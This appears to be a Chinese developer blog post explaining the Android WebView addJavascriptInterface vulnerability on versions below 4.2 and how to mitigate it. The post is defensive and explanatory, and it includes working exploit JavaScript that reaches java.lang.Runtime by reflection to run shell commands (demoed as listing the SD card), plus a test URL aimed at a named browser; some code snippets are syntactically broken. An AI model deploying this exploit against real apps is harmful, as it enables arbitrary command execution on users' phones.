最近在做一個項目過程中,發現了一個很嚴重的安全漏洞,這個漏洞是烏雲平台(http://www.wooyun.org)報告出來的。
我們很多時候要使用webview來展示一個網頁,現在很多應用為了做到服務端可控,很多結果頁都是網頁的,而不是本地實作,這樣做有很多好處,比如界面的改變不需要重新釋出新版本,直接在server端修改就行了。用網頁來展示界面,通常情況下都或多或少都與java代碼有互動,比如點選網頁上面的一個按鈕,我們需要知道這個按鈕點選事件,或者我們要調用某個方法,讓頁面執行某種動作,為了實作這些互動,我們通常都是使用js來實作,而webview已經提供了這樣的方法,具體用法如下:
mwebview.getsettings().setjavascriptenabled(true);
mwebview.addjavascriptinterface(new jsinterface(), "jsinterface");
我們向webview注冊一個名叫“jsinterface”的對象,然後在js中可以通路到jsinterface這個對象,就可以調用這個對象的一些方法,最終可以調用到java代碼中,進而實作了js與java代碼的互動。
我們一起來看看關于addjavascriptinterface方法在android官網的描述:
below, because javascript could use reflection to access an injected object's public fields. use of this method in a webview containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing java code with
the permissions of the host application. use extreme care when using this method in a webview which could contain untrusted content.
javascript interacts with java object on a private, background thread of this webview. care is therefore required to maintain thread safety.
the java object's fields are not accessible.
簡單地說,就是用addjavascriptinterface可能導緻不安全,因為js可能包含惡意代碼。今天我們要說的這個漏洞就是這個,當js包含惡意代碼時,它可以幹任何事情。
1,webview添加了javascript對象,并且目前應用具有讀寫sdcard的權限,也就是:android.permission.write_external_storage
2,js中可以周遊window對象,找到存在“getclass”方法的對象的對象,然後再通過反射的機制,得到runtime對象,然後調用靜态方法來執行一些指令,比如通路檔案的指令.
3,再從執行指令後傳回的輸入流中得到字元串,就可以得到檔案名的資訊了。然後想幹什麼就幹什麼,好危險。核心js代碼如下:
function execute(cmdargs)
{
for (var obj in window) {
if ("getclass" in window[obj]) {
alert(obj);
return window[obj].getclass().forname("java.lang.runtime")
.getmethod("getruntime",null).invoke(null,null).exec(cmdargs);
}
}
}
舉例一:為了證明這個漏洞,寫了一個demo來說明。我就隻是加載一個包含惡意js代碼的本地網頁,html其代碼如下:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<script>
var i=0;
function getcontents(inputstream)
{
var contents = ""+i;
var b = inputstream.read();
var i = 1;
while(b != -1) {
var bstring = string.fromcharcode(b);
contents += bstring;
contents += "\n"
b = inputstream.read();
i=i+1;
return contents;
}
function execute(cmdargs)
{
for (var obj in window) {
console.log(obj);
if ("getclass" in window[obj]) {
alert(obj);
return window[obj].getclass().forname("java.lang.runtime").
getmethod("getruntime",null).invoke(null,null).exec(cmdargs);
}
}
}
var p = execute(["ls","/mnt/sdcard/"]);
document.write(getcontents(p.getinputstream()));
</script>
<script language="javascript">
function onbuttonclick()
// call the method of injected object from android source.
var text = jsinterface.onbuttonclick("從js中傳遞過來的文本!!!");
alert(text);
}
function onimageclick()
//call the method of injected object from android source.
var src = document.getelementbyid("image").src;
var width = document.getelementbyid("image").width;
var height = document.getelementbyid("image").height;
jsinterface.onimageclick(src, width, height);
</head>
<body>
<p>點選圖檔把url傳到java代碼</p>
<img class="curved_box" id="image"
onclick="onimageclick()"
width="328"
height="185"
src="http://t1.baidu.com/it/u=824022904,2596326488&fm=21&gp=0.jpg"
onerror="this.src='background_chl.jpg'"/>
</p>
<button type="button" onclick="onbuttonclick()">與java代碼互動</button>
</body>
</html>
這段html的運作效果如下:
圖一:期望運作結果圖
上圖中,點選按鈕後,js中傳遞 一段文本到java代碼,顯示一下個toast,點選圖檔後,把圖檔的url,width,height傳到java層,也用toast顯示出來。
要實作這樣的功能,就需要注java對象。
簡單說明一下
1,請看execute()這個方法,它周遊所有window的對象,然後找到包含getclass方法的對象,利用這個對象的類,找到java.lang.runtime對象,然後調用“getruntime”靜态方法方法得到runtime的執行個體,再調用exec()方法來執行某段指令。
2,getcontents()方法,從流中讀取内容,顯示在界面上。
3,關鍵的代碼就是以下兩句
return window[obj].getclass().forname("java.lang.runtime").
java代碼實作如下:
mwebview = (webview) findviewbyid(r.id.webview);
mwebview.loadurl("file:///android_asset/html/test.html");
需要添加的權限:
<uses-permission android:name="android.permission.internet"/>
<uses-permission android:name="android.permission.access_network_state" />
<uses-permission android:name="android.permission.write_external_storage" />
當點選load菜單後,運作截圖如下:(理論上應該出現圖一界面)
圖二:實際運作結果,列出了sdcard中的檔案
舉例二:360浏覽器也存在這個問題,我測試的系統是android 4.0.2,360浏覽器版本是:4.8.7
在浏覽器輸入框中輸入:http://bitkiller.duapp.com/jsobj.html,然後前往,它會出現如下的界面
圖三:360浏覽器運作結果
說明:其中searchboxjavabridge_不是360注入的對象,而是webview内部注入的,這是在3.0以後的android系統上添加的。
在關閉這個對話框之後,它會列出目前sdcard上面的所有檔案清單,如下圖所示
圖四:錯誤結果
1,android 4.2以上的系統
在android 4.2以上的,google作了修正,通過在java的遠端方法上面聲明一個@javascriptinterface,如下面代碼:
class jsobject {
@javascriptinterface
public string tostring() { return "injectedobject"; }
}
webview.addjavascriptinterface(new jsobject(), "injectedobject");
webview.loaddata("", "text/html", null);
webview.loadurl("javascript:alert(injectedobject.tostring())");
2,android 4.2以下的系統
這個問題比較難解決,但也不是不能解決。
首先,我們肯定不能再調用addjavascriptinterface方法了。關于這個問題,最核心的就是要知道js事件這一個動作,js與java進行互動我們知道,有以下幾種,比prompt, alert等,這樣的動作都會對應到webchromeclient類中相應的方法,對于prompt,它對應的方法是onjsprompt方法,這個方法的聲明如下:
public boolean onjsprompt(webview view, string url, string message,
string defaultvalue, jspromptresult result)
通過這個方法,js能把資訊(文本)傳遞到java,而java也能把資訊(文本)傳遞到js中,通知這個思路我們能不能找到解決方案呢?
經過一番嘗試與分析,找到一種比較可行的方案,請看下面幾個小點:
【1】讓js調用一個javascript方法,這個方法中是調用prompt方法,通過prompt把js中的資訊傳遞過來,這些資訊應該是我們組合成的一段有意義的文本,可能包含:特定辨別,方法名稱,參數等。在onjsprompt方法中,我們去解析傳遞過來的文本,得到方法名,參數等,再通過反射機制,調用指定的方法,進而調用到java對象的方法。
【2】關于傳回值,可以通過prompt傳回回去,這樣就可以把java中方法的處理結果傳回到js中。
【3】我們需要動态生成一段聲明javascript方法的js腳本,通過loadurl來加載它,進而注冊到html頁面中,具體的代碼如下:
javascript:(function jsaddjavascriptinterface_(){
if (typeof(window.jsinterface)!='undefined') {
console.log('window.jsinterface_js_interface_name is exist!!');}
else {
window.jsinterface = {
onbuttonclick:function(arg0) {
return prompt('myapp:'+json.stringify({obj:'jsinterface',func:'onbuttonclick',args:[arg0]}));
},
onimageclick:function(arg0,arg1,arg2) {
prompt('myapp:'+json.stringify({obj:'jsinterface',func:'onimageclick',args:[arg0,arg1,arg2]}));
};
)()
說明:
1,上面代碼中的jsinterface就是要注冊的對象名,它注冊了兩個方法,onbuttonclick(arg0)和onimageclick(arg0, arg1, arg2),如果有傳回值,就添加上return。
2,prompt中是我們約定的字元串,它包含特定的辨別符myapp:,後面包含了一串json字元串,它包含了方法名,參數,對象名等。
3,當js調用onbuttonclick或onimageclick時,就會回調到java層中的onjsprompt方法,我們再解析出方法名,參數,對象名,再反射調用方法。
4,window.jsinterface這表示在window上聲明了一個js對象,聲明方法的形式是:方法名:function(參數1,參數2)
以下是在實作這個解決方案過程中遇到的一些問題和思考:
【1】生成js方法後,加載這段js的時機是什麼?
剛開始時在當webview正常加載url後去加載js,但發現會存在問題,如果當webview跳轉到下一個頁面時,之前加載的js就可能無效了,是以需要再次加載。這個問題經過嘗試,需要在以下幾個方法中加載js,它們是webchromeclient和webviewclient的方法:
onloadresource
doupdatevisitedhistory
onpagestarted
onpagefinished
onreceivedtitle
onprogresschanged
目前測試了這幾個地方,沒什麼問題,這裡我也不能完全確定沒有問題。
【2】需要過濾掉object類的方法
由于通過反射的形式來得到指定對象的方法,他會把基類的方法也會得到,最頂層的基類就是object,是以我們為了不把getclass方法注入到js中,是以我們需要把object的公有方法過濾掉。這裡嚴格說來,應該有一個需要過濾方法的清單。目前我的實作中,需要過濾的方法有:
"getclass",
"hashcode",
"notify",
"notifyall",
"equals",
"tostring",
"wait",
【3】通過手動loadurl來加載一段js,這種方式難道js中的對象就不在window中嗎?也就是說,通過周遊window的對象,不能找到我們通過loadurl注入的js對象嗎?
關于這個問題,我們的方法是通過js聲明的,通過loadurl的形式來注入到頁面中,其實本質相當于把我們這動态生成的這一段js直接寫在html頁面中,是以,這些js中的window中雖然包含了我們聲明的對象,但是他們并不是java對象,他們是通過js文法聲明的,是以不存在getclass之類的方法。本質上他們是js對象。
【4】在android 3.0以下,系統自己添加了一個叫searchboxjavabridge_的js接口,要解決這個安全問題,我們也需要把這個接口删除,調用removejavascriptinterface方法。這個searchboxjavabridge_好像是跟google的搜尋框相關的。
【5】在實作過程中,我們需要判斷系統版本是否在4.2以下,因為在4.2以上,android修複了這個安全問題。我們隻是需要針對4.2以下的系統作修複。
轉載請注明出處,謝謝大家!!!
<a target="_blank" href="http://download.csdn.net/detail/leehong2005/6341685">源碼下載下傳</a>